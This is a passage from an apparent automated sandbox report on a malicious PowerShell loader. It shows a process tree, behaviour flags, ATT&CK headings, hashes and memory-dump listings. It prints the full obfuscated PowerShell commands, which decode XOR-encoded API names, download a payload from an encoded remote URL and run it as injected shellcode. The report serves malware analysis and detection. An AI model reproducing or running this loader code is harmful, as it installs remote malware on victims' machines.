9S3 2M3 A 1 0T1CAR1CDM0 C 0 4H4F7 3 B 1 C 0 7 1TD 0T0F0 4 0RCH4 7 2T0V0A7O1CD 0 C 1pB 0 6A1 9P3OAH0 CA1DB 1RFS0F0S0 A 0ECG1FAS4G7 2B4 0U8O1RBI1BA 0K1S0S8U0W5K3 4T5 3e5T3A2 ES0 CO1CDG2 DV0ACM0 5u0 CM0UEB0S8D1 D 0 CF2GFO0D6H1eB 2UFB1IC 0S7 0PAS1SDL0 0H0H6A0 7 3 9s0D6O0 0 0 7T1 DM0GCI1EBB4 1S4H1 0 F 0S2S1 9 4A9T4HDG3AAE0 6N1RBg0M6 4R9P4ADa2A0 0G4 0 4K0 8T0 7 4U0C4 5S4 9 4 1G2NE 2GD 3 D 4 9f2P9M4D1m3p2T2 0T0S7 1ZDM3 9O1RDA1iB 3S4 4R5 4T9B3A2U2T0O0E7 1BDR3 9S1 D 1 B 3O4S4K5 4 9 3 2 2U0F0O7U1BD 3N9 1BDF1 Bm3S4 4 5 4 9A3U2E2L0G0M7 1 D 3P9 1FDT1 BI3 4 4B5K4M9 3f2 2M0A0T7U1ADT3 9T1MD 1SB 3 4R4 0F4 9 4 1L3 2 2 0D0 7T1VDM3 9 1 DT1 Bm3S4U4C0 4 0 4 0 'a; . (C`$FeBh r lK7H)H C`$MSCpNh eGrKo mB2 ;C`$GSUp h e rOo mP3 c=S WIBnMcTlB1 1S ' 4CDk2h1S1 0 0LD 1NBF0 6 1F9 0K1 4 7I2B0 0 7B1 FM0D6O0S2 0TCK4H1 4HDB3 9B0R8s1TFT0 C 0L2A0 0 1 B 0 2 0DCN0m7O5KAM4B5b4 DJ3GEA0A1E0FCK1JBG0TCR0lFK4e5S4MD 3 9 1SA 1 0H0 AL4G5P5 9C4 5 5A9 4 0S' ;U. (L`$ e hsr lU7 ) R`$ S pThre rPoGm 3K#Y;""";Function Spherom9 { param([String]$Wavel); For($Foreffel=1; $Foreffel -lt $Wavel.Length-1; $Foreffel+=(1+1)){$Incl = $Incl + $Wavel.Substring($Foreffel, 1)}; $Incl;}$Prov0 = Spherom9 'LIFE X ';$Prov1= Spherom9 $Misjoinam;if([IntPtr]::size -eq 8){.$env:systemroot\*ysw*64\*indo*ower*\v1.*\po*ll.exe $Prov1 ;}else{.$Prov0 $Prov1;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:764
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Incl11 { param([String]$Wavel); $Lingvi = ''; Write-Host $Lingvi; Write-Host $Lingvi; Write-Host $Lingvi; $Unrefut = New-Object byte[] ($Wavel.Length / 2); For($Foreffel=0; $Foreffel -lt $Wavel.Length; $Foreffel+=2){ $Kommando = $Wavel.Substring($Foreffel, 2); $Unrefut[$Foreffel/2] = [convert]::ToByte($Kommando, 16); $Lastendes160 = ($Unrefut[$Foreffel/2] -bxor 105); $Unrefut[$Foreffel/2] = $Lastendes160; } [String][System.Text.Encoding]::ASCII.GetString($Unrefut);}$Matema0=Incl11 '3A101A1D0C04470D0505';$Matema1=Incl11 '24000A1B061A060F1D473E00075A5B473C071A080F0C27081D001F0C240C1D01060D1A';$Matema2=Incl11 '2E0C1D391B060A280D0D1B0C1A1A';$Matema3=Incl11 '3A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F';$Matema4=Incl11 '1A1D1B00070E';$Matema5=Incl11 '2E0C1D24060D1C050C2108070D050C';$Matema6=Incl11 '3B3D3A190C0A0008052708040C454921000D0C2B103A000E4549391C0B05000A';$Matema7=Incl11 '3B1C071D00040C4549240807080E0C0D';$Matema8=Incl11 '3B0C0F050C0A1D0C0D2D0C050C0E081D0C';$Matema9=Incl11 '2007240C04061B1024060D1C050C';$ehrl0=Incl11 '24102D0C050C0E081D0C3D10190C';$ehrl1=Incl11 '2A05081A1A4549391C0B05000A45493A0C08050C0D454928071A002A05081A1A4549281C1D062A05081A1A';$ehrl2=Incl11 '20071F06020C';$ehrl3=Incl11 '391C0B05000A454921000D0C2B103A000E4549270C1E3A05061D45493F001B1D1C0805';$ehrl4=Incl11 '3F001B1D1C0805280505060A';$ehrl5=Incl11 '071D0D0505';$ehrl6=Incl11 '271D391B061D0C0A1D3F001B1D1C0805240C04061B10';$ehrl7=Incl11 '202C31';$ehrl8=Incl11 '35';$Soro=Incl11 '3C3A2C3B5A5B';$Imman=Incl11 '2A0805053E00070D061E391B060A28';function fkp {Param ($Roman, $Makaronie) ;$Trothed0 =Incl11 '4D2F0C1B0449544941322819192D06040800073453532A1C1B1B0C071D2D0604080007472E0C1D281A1A0C040B05000C1A41404915493E010C1B0C44260B030C0A1D4912494D36472E05060B0805281A1A0C040B05102A080A010C494428070D494D364725060A081D000607473A1905001D414D0C011B05514032445834472C181C08051A414D24081D0C04085940491440472E0C1D3D10190C414D24081D0C04085840';.($ehrl7) $Trothed0;$Trothed5 = Incl11 '4D240005004954494D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085B4549323D10190C3234344929414D24081D0C04085A45494D24081D0C04085D4040';.($ehrl7) $Trothed5;$Trothed1 = Incl11 '1B0C1D1C1B07494D240005004720071F06020C414D071C050545492941323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F3441270C1E44260B030C0A1D493A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F4141270C1E44260B030C0A1D4920071D391D1B404549414D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085C40404720071F06020C414D071C0505454929414D3B060408074040404045494D240802081B0607000C4040';.($ehrl7) $Trothed1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Ilderem,[Parameter(Position = 1)] [Type] $Glasslibe = [Void]);$Trothed2 = Incl11 '4D2A060C05081A1D1B495449322819192D06040800073453532A1C1B1B0C071D2D0604080007472D0C0F00070C2D10070804000A281A1A0C040B05104141270C1E44260B030C0A1D493A101A1D0C04473B0C0F050C0A1D00060747281A1A0C040B05102708040C414D24081D0C04085140404549323A101A1D0C04473B0C0F050C0A1D000607472C04001D47281A1A0C040B05102B1C00050D0C1B280A0A0C1A1A3453533B1C0740472D0C0F00070C2D10070804000A24060D1C050C414D24081D0C04085045494D0F08051A0C40472D0C0F00070C3D10190C414D0C011B055945494D0C011B05584549323A101A1D0C0447241C051D000A081A1D2D0C050C0E081D0C3440';.($ehrl7) $Trothed2;$Trothed3 = Incl11 '4D2A060C05081A1D1B472D0C0F00070C2A06071A1D1B1C0A1D061B414D24081D0C04085F4549323A101A1D0C04473B0C0F050C0A1D000607472A08050500070E2A06071F0C071D0006071A3453533A1D08070D081B0D45494D20050D0C1B0C0440473A0C1D200419050C040C071D081D0006072F05080E1A414D24081D0C04085E40';.($ehrl7) $Trothed3;$Trothed4 = Incl11 '4D2A060C05081A1D1B472D0C0F00070C240C1D01060D414D0C011B055B45494D0C011B055A45494D2E05081A1A05000B0C45494D20050D0C1B0C0440473A0C1D200419050C040C071D081D0006072F05080E1A414D24081D0C04085E40';.($ehrl7) $Trothed4;$Trothed5 = Incl11 '1B0C1D1C1B07494D2A060C05081A1D1B472A1B0C081D0C3D10190C4140';.($ehrl7) $Trothed5 ;}$Indu = Incl11 '020C1B070C055A5B';$Incl03 = Incl11 '2E0C1D2A06071A06050C3E00070D061E';$Incl00=Incl11 '3A01061E3E00070D061E';$Incl01 = Incl11 '4D2B001A1D081D0C005B5D58495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D3A061B06494D20070A055959404549412E2D3D4929413220071D391D1B344549323C20071D5A5B344049413220071D391D1B34404040';.($ehrl7) $Incl01;$Incl02 = Incl11 '4D2819081D08495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D20070D1C494D20070A05595A404549412E2D3D4929413220071D391D1B344049413220071D391D1B34404040';.($ehrl7) $Incl02;$Trothed7 = Incl11 '4D3D0019064954494D2819081D084720071F06020C415940';.($ehrl7) $Trothed7;$Trothed7 = Incl11 '4D2B001A1D081D0C005B5D584720071F06020C414D3D00190645495940';.($ehrl7) $Trothed7;$Trothed6 = Incl11 '4D00070D0F030C1D495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D20070D1C494D0C011B055D404549412E2D3D4929413220071D391D1B344549323C20071D5A5B344549323C20071D5A5B344549323C20071D5A5B344049413220071D391D1B34404040';.($ehrl7) $Trothed6;$Psyc = fkp $ehrl5 $ehrl6;$Trothed7 = Incl11 '4D39081F0C02001B020C075A4954494D00070D0F030C1D4720071F06020C413220071D391D1B345353330C1B0645495F5C5F454959115A595959454959115D5940';.($ehrl7) $Trothed7;$Trothed8 = Incl11 '4D3E010C1B0C0F4954494D00070D0F030C1D4720071F06020C413220071D391D1B345353330C1B0645495B585851515F5951454959115A595959454959115D40';.($ehrl7) $Trothed8;$Incl01 = Incl11 '011D1D191A534646181C000A020A010C0A0211470E001D011C0B47000646181C000A02040C463C0D0E0807471C5A5B';$Incl00 = Incl11 '4D3A19010C1B060449544941270C1E44260B030C0A1D49270C1D473E0C0B2A05000C071D40472D061E070506080D3A1D1B00070E414D20070A05595840';$Trothed8 = Incl11 '4D39081F0C02001B020C075B544D0C071F530819190D081D08';.($ehrl7) $Trothed8;$Pavekirken2=$Pavekirken2+'\Spas.urf';$Spherom='';if (-not(Test-Path $Pavekirken2)) {while ($Spherom -eq '') {.($ehrl7) $Incl00;Start-Sleep 5;}Set-Content $Pavekirken2 $Spherom;}$Spherom = Get-Content $Pavekirken2;$Trothed9 = Incl11 '4D3D1B061D010C0D495449323A101A1D0C04472A06071F0C1B1D3453532F1B06042B081A0C5F5D3A1D1B00070E414D3A19010C1B060440';.($ehrl7) $Trothed9;$Spherom0 = Incl11 '323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532A061910414D3D1B061D010C0D4549594549494D39081F0C02001B020C075A45495F5C5F40';.($ehrl7) $Spherom0;$Magn=$Trothed.count-656;$Spherom1 = Incl11 '323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532A061910414D3D1B061D010C0D45495F5C5F45494D3E010C1B0C0F45494D24080E0740';.($ehrl7) $Spherom1;$Spherom2 = Incl11 '4D21100D1B061901495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D3A061B06494D2004040807404549412E2D3D4929413220071D391D1B3445493220071D391D1B3445493220071D391D1B3445493220071D391D1B3445493220071D391D1B344049413220071D391D1B34404040';.($ehrl7) $Spherom2;$Spherom3 = Incl11 '4D21100D1B0619014720071F06020C414D39081F0C02001B020C075A454D3E010C1B0C0F454D391A100A4559455940';.($ehrl7) $Spherom3#"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1868

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IUNE6OLCAZPMECYZ2SP5.temp

Filesize
7KB

MD5
fdfb4ff8677080344ea01b8d12c432a7

SHA1
215265b5107831e68d08a1c87806e41ed40d79ea

SHA256
32213e00030ed166a3704ec60bf270aa3d5ead4f60b034798ed732d04fc552af

SHA512
a84de34bb4142e2c8466cc42b9b6f29a7f6c6c2b95d49196a97a6909bceb9e4ab0bfd16d4f35bc84c38f3366440dde82d69b44c93858e5033ea77e411b9a9915

Download Submit
memory/764-71-0x0000000002760000-0x00000000027E0000-memory.dmp

Filesize
512KB

Download
memory/764-68-0x0000000002760000-0x00000000027E0000-memory.dmp

Filesize
512KB

Download
memory/764-61-0x0000000002760000-0x00000000027E0000-memory.dmp

Filesize
512KB

Download
memory/764-62-0x0000000002760000-0x00000000027E0000-memory.dmp

Filesize
512KB

Download
memory/764-63-0x0000000002760000-0x00000000027E0000-memory.dmp

Filesize
512KB

Download
memory/764-59-0x00000000023E0000-0x00000000023E8000-memory.dmp

Filesize
32KB

Download
memory/764-60-0x0000000002760000-0x00000000027E0000-memory.dmp

Filesize
512KB

Download
memory/764-58-0x000000001B260000-0x000000001B542000-memory.dmp

Filesize
2.9MB

Download
memory/764-70-0x0000000002760000-0x00000000027E0000-memory.dmp

Filesize
512KB

Download
memory/764-69-0x0000000002760000-0x00000000027E0000-memory.dmp

Filesize
512KB

Download
memory/1868-66-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/1868-67-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/1868-72-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/1868-73-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download
memory/1868-74-0x0000000002610000-0x0000000002650000-memory.dmp

Filesize
256KB

Download